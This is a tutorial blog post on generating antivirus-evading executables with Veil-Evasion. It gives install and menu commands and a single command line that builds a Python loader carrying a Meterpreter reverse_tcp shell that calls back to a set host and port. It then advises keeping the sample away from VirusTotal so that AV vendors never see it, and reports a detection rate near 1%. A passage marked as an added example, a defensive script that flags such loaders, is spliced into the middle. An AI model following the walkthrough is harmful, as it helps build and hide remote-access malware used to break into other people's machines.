Veil is a Python program that attempts to automate the creation of AV-evading payloads in a new framework.
Veil-Evasion is a tool to generate payload executables that bypass common antivirus solutions by building each payload with randomness. Veil-Evasion’s code is located at https://www.github.com/Veil-Framework/Veil-Evasion/ and it is part of the Veil super project at https://github.com/Veil-Framework/Veil, which we recommend most users clone and install.
We can also use payloads from the Metasploit Framework; it is compatible with both x86 and x64 architectures, and Veil can be updated either from the command line or from the menu.
If you want to install Veil in your own environment you can use the commands below:
#wget -c https://codeload.github.com/Veil-Framework/Veil-Evasion/zip/master
#unzip -q master.zip
#cd Veil-Evasion-master/setup
#./setup.sh
After Veil is installed, just run it with the command below:
#./Veil-Evasion.py
Then change to the “Veil-Master” directory and launch the ./Veil-Evasion.py Python script. The Veil window will appear. At the time of writing it has 31 payloads:
You can obtain a list of all the payloads with the “list” command:
[>] Please enter a command: list
[>] Please enter a command: use 27
[>] Please enter a command: set use_pyherion Y
The payloads include PyInjector-style payload injection, with or without encryption, and PowerShell injection of payloads. PyInjector creates a Python executable with an embedded ASCII payload in it, but it uses standard Windows API calls to put the payload in memory and execute it.
Both of these methods are very effective for AV evasion. I am going to use the python/b64_substitution payload. This method uses the PyInjector style of injection with substitution of the payload. I type “use 27” and press Enter. It loads that component, as shown below:
[>] Please enter a command: generate
After issuing the generate command, wait while the shellcode is generated.
Now we select msfvenom by typing “1”:
[>] Please enter the number of your choice : 1
After that we need to type some details:
Enter metasploit payload: “windows/meterpreter/reverse_tcp”
Enter value for ‘LHOST’, [tab] for local IP: “192.168.31.20”
Enter value for ‘LPORT’: “443”
Press Enter, and Veil then asks for a name for our payload; in this case “undetectable”.
We are going to use PyInstaller, which compiles the script into a .exe. For this, we type “1”:
[>] Please enter the number of your choice : 1
Next, I issue the “generate” command and press enter to create the executable.
The Python programmers reading this will certainly appreciate the source code that is produced. Look at this beautiful hot mess of a program! All the variable names are randomized. The payloads are encrypted and encoded.
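The randomised, base64-substituted loader described above is exactly the shape a defender should be able to recognise in a Python source file. The following script is an added example, not part of the original post or of Veil: it uses Python’s ast module to triage a source file for the PyInjector-style allocate-copy-execute chain. The kernel32 API names are the widely documented PyInjector pattern rather than something the post states, and both input samples are constructed, with placeholder call arguments.

```python
import ast
import re
# Kernel32 entry points chained by PyInjector-style loaders (the widely
# documented pattern; the post itself names only "standard Windows API calls").
INJECTION_APIS = {"VirtualAlloc", "RtlMoveMemory", "CreateThread", "WaitForSingleObject"}
DECODERS = {"b64decode", "decodestring"}
# Four consonants in a row are rare in human-chosen names but common in
# random letter strings, so this serves as a weak randomisation signal.
RANDOM_NAME = re.compile(r"^[a-z]*[bcdfghjklmnpqrstvwxz]{4}[a-z]*$")

def triage(source: str) -> dict:
    """Parse Python source and collect PyInjector-style indicators."""
    tree = ast.parse(source)
    apis, decoders, names = set(), set(), set()
    ctypes_imported = False
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            ctypes_imported |= any(a.name == "ctypes" for a in node.names)
        elif isinstance(node, ast.ImportFrom):
            ctypes_imported |= node.module == "ctypes"
        elif isinstance(node, ast.Attribute):
            if node.attr in INJECTION_APIS:
                apis.add(node.attr)
            elif node.attr in DECODERS:
                decoders.add(node.attr)
        elif isinstance(node, ast.Name) and len(node.id) >= 8 and RANDOM_NAME.match(node.id):
            names.add(node.id)
    # Allocate-copy-execute is the core chain; decoding and randomised
    # identifiers corroborate it but are not enough on their own.
    core = ctypes_imported and {"VirtualAlloc", "CreateThread"} <= apis
    score = int(ctypes_imported) + len(apis) + int(bool(decoders)) + int(len(names) >= 3)
    return {"apis": sorted(apis), "decoders": sorted(decoders), "random_names": sorted(names),
            "score": score, "verdict": "likely in-memory loader" if core else "no loader pattern"}

# Constructed sample shaped like a randomised PyInjector loader; the call
# arguments are placeholder names, so it is structurally representative only.
SUSPECT = """
import ctypes, base64
qzxvkbnmp = base64.b64decode(ENCODED_PLACEHOLDER)
wrtplkjhg = ctypes.windll.kernel32.VirtualAlloc(ALLOC_ARGS_PLACEHOLDER)
ctypes.windll.kernel32.RtlMoveMemory(wrtplkjhg, qzxvkbnmp, len(qzxvkbnmp))
mnbvcxzlk = ctypes.windll.kernel32.CreateThread(THREAD_ARGS_PLACEHOLDER)
ctypes.windll.kernel32.WaitForSingleObject(mnbvcxzlk, WAIT_PLACEHOLDER)
"""
# Constructed benign script: ctypes and base64, but no allocate-copy-execute chain.
BENIGN = """
import ctypes, base64
uptime_ms = ctypes.windll.kernel32.GetTickCount()
banner = base64.b64decode(b"aGVsbG8=")
"""
```

Because the check is structural (AST attributes and imports) rather than a string match, the randomised variable names do not hide the chain; the consonant-run heuristic is deliberately only a corroborating signal.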
Better still, Veil-Evasion is accessible directly from the command line, so you don’t have to use the console to generate these payloads.
I can generate the same payload by running the following single command:
#./Veil-Evasion.py -l python -p python/b64_substitution -o trytofindthis --msfpayload windows/meterpreter/reverse_tcp --msfoptions LHOST=192.168.31.20 LPORT=443
With this command-line interface you can bypass Veil’s menu system and drive it from scripts.
In the end, we can get our executable at “/root/Veil-master/output/compiled/”
Veil’s developers ask that payloads not be submitted to http://www.virustotal.com, to avoid distribution to the anti-virus vendors. An alternative is vscan.novirusthanks.org. That site scans suspicious files for malware detection and offers the option “Do not distribute the sample”.
Now that we have our executable, we submit it to vscan.novirusthanks.org. Please remember to check “Do not distribute the sample”. If you don’t check this option, or you submit the executable to http://www.virustotal.com, your file will be analysed and may be recognised by some anti-virus vendors.
You can see in the picture above that hardly any of the anti-virus vendors detected our file as malicious. We have a detection rate of nearly 1%!